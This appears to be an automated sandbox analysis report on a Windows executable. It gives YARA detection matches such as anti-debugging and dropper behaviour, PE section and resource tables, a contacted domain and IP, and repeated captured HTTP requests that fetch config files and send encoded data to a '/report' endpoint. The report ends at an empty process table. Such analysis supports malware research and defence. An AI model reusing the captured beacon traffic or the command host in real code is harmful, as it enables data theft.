Yara Pattern Name | Description |
---|---|
IsPE32 | No Description Available |
HasOverlay | Overlay Check |
HasDigitalSignature | DigitalSignature Check |
HasRichSignature | Rich Signature Check |
anti_dbg | Checks if being debugged |
network_dropper | File downloader/dropper |
screenshot | Take screenshot |
win_token | Affect system token |
win_files_operation | Affect private profile |
BLOWFISH_Constants | Look for Blowfish constants |
VC8_Random | Look for Random function |
suspicious_packer_section | The packer/protector section names/keywords |
Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
---|---|---|---|---|
.text | 0x00001000 | 0x00005a18 | 0x00005c00 | 6.40732846271 |
.rdata | 0x00007000 | 0x00002f54 | 0x00003000 | 5.05967863015 |
.data | 0x0000a000 | 0x00001968 | 0x00000c00 | 2.59807415291 |
.rsrc | 0x0000c000 | 0x0001c1a0 | 0x0001c200 | 5.19396939112 |
.reloc | 0x00029000 | 0x000010d0 | 0x00001200 | 3.81846740698 |
Name | Offset | Size | Language | Sub-language | File type |
---|---|---|---|---|---|
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_ICON | 0x00027498 | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_GROUP_ICON | 0x00027900 | 0x000000ae | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_VERSION | 0x000279b0 | 0x0000025c | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
RT_MANIFEST | 0x00027c0c | 0x00000591 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
Domain | IP Address | Destination Location |
---|---|---|
mstdata.yyzmxcnxh.com | 121.40.77.138 | CN |
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /Public/conf/ctrol1/StarEditor.ini HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /report?data=NtwKt%2FUz%2BlXmNZVKTBOwCSkjYDXflpKa9azkTXtPSWLP1YQqwri9aLNKmqXmHMGpfQpnAb8xXFQSJ%2BHrQhoYSgssfDdc%2BpsixRdv9B1AWjGxGRohUgA%2BtWogy00%2B%2F26W5xUUo4YqAUGxauYEWnDQP6gGoNtWxs957OCziMFBo%2F4hRepUSpCBvJxe2nPUXEFGMG%2BSevmbAamoQalDTSgMJh1cbyZPzGrkM%2FUuEDl1MGF4zXciUDE2Q6gzsg5unD7t&sgin=5b322c5d6c094987a3b19fa6469f6091 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /report/?data=Mi47N5ce%2FibmNZVKTBOwCR6Q6Ffy9tnV5jWVSkwTsAk0W0XIlTxL3h8j7qO5GkTR8VgL9I5QkGhW0WQloQJIMgKlFybl3TAbAizX9nT0yeDSpSp5qIka5LZmH2kwLdSHv5%2BtmHZ7JcJXEhaCMRo6u%2Bzm57xjV68%2FVSsN3S%2FthvlOzY7hZhODNpYEL8pa5b82Ut7by3Ths8x55tLAbnF4mhCDfom2EO2bLVegA6%2B9vtjkNnS7MR8fvMVOV1OUcd7WuFcU9NMumJdEL4eiDwgfCZWi5n%2BWrukWd%2Fekf2xal3Jl%2FnD6DXXE9bAFaBpFDKiB&sgin=34687bb5c59278174757d49a3c2858bc HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /report?data=NtwKt%2FUz%2BlXmNZVKTBOwCSkjYDXflpKa9azkTXtPSWLP1YQqwri9aLNKmqXmHMGpfQpnAb8xXFQSJ%2BHrQhoYSgssfDdc%2BpsixRdv9B1AWjGxGRohUgA%2BtWogy00%2B%2F26W5xUUo4YqAUGxauYEWnDQP6gGoNtWxs957OCziMFBo%2F4hRepUSpCBvJxe2nPUXEFGMG%2BSevmbAamoQalDTSgMJh1cbyZPzGrkM%2FUuEDl1MGF4zXciUDE2Q6gzsg5unD7t&sgin=5b322c5d6c094987a3b19fa6469f6091 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /Public/conf/ctrol1/StarEditor.ini HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /report/?data=Mi47N5ce%2FibmNZVKTBOwCR6Q6Ffy9tnV5jWVSkwTsAk0W0XIlTxL3h8j7qO5GkTR8VgL9I5QkGhW0WQloQJIMgKlFybl3TAbAizX9nT0yeDSpSp5qIka5LZmH2kwLdSHv5%2BtmHZ7JcJXEhaCMRo6u%2Bzm57xjV68%2FVSsN3S%2FthvlOzY7hZhODNpYEL8pa5b82Ut7by3Ths8x69hJ25vAHzCQb9R7XICXZLVegA6%2B9vtjkNnS7MR8fvMVOV1OUcd7WuFcU9NMumJdEL4eiDwgfCZWi5n%2BWrukWd%2Fekf2xal3Jl%2FnD6DXXE9bAFaBpFDKiB&sgin=1aa711a74e9b4561baf5b7e0e192854d HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /Public/conf/ctrol1/StarEditor.ini HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /report?data=NtwKt%2FUz%2BlXmNZVKTBOwCSkjYDXflpKa9azkTXtPSWLP1YQqwri9aLNKmqXmHMGpfQpnAb8xXFQSJ%2BHrQhoYSgssfDdc%2BpsixRdv9B1AWjGxGRohUgA%2BtWogy00%2B%2F26W5xUUo4YqAUGGQxD0W6TxBd5JDE3VAOlh7OCziMFBo%2F4hRepUSpCBvJxe2nPUXEFGMG%2BSevmbAamoQalDTSgMJh1cbyZPzGrkM%2FUuEDl1MGF4zXciUDE2Q6gzsg5unD7t&sgin=977146f37681dd8538db9747ba20658f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /report?data=NtwKt%2FUz%2BlXmNZVKTBOwCSkjYDXflpKa9azkTXtPSWLP1YQqwri9aLNKmqXmHMGpfQpnAb8xXFQSJ%2BHrQhoYSgssfDdc%2BpsixRdv9B1AWjGxGRohUgA%2BtWogy00%2B%2F26W5xUUo4YqAUGGQxD0W6TxBd5JDE3VAOlh7OCziMFBo%2F4hRepUSpCBvJxe2nPUXEFGMG%2BSevmbAamoQalDTSgMJh1cbyZPzGrkM%2FUuEDl1MGF4zXciUDE2Q6gzsg5unD7t&sgin=977146f37681dd8538db9747ba20658f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache Connection: Keep-Alive
GET /report/?data=Mi47N5ce%2FibmNZVKTBOwCR6Q6Ffy9tnV5jWVSkwTsAk0W0XIlTxL3h8j7qO5GkTR8VgL9I5QkGhW0WQloQJIMgKlFybl3TAbAizX9nT0yeDSpSp5qIka5LZmH2kwLdSHv5%2BtmHZ7JcJXEhaCMRo6u%2Bzm57xjV68%2FVSsN3S%2FthvlOzY7hZhODNpYEL8pa5b82Ut7by3Ths8wRHZj3HsykdxuhR4YUQmnhLVegA6%2B9vtjkNnS7MR8fvMVOV1OUcd7WuFcU9NMumJdEL4eiDwgfCZWi5n%2BWrukWd%2Fekf2xal3Jl%2FnD6DXXE9bAFaBpFDKiB&sgin=e4ca4d9dbbe77368e205674a90fb9db0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Host: mstdata.yyzmxcnxh.com Cache-Control: no-cache
IP Address | Country of Origin |
---|---|
121.40.77.138 | CN |
104.17.210.204 | US |
104.17.233.204 | US |
104.17.116.176 | US |
Process Name | PID | Parent PID |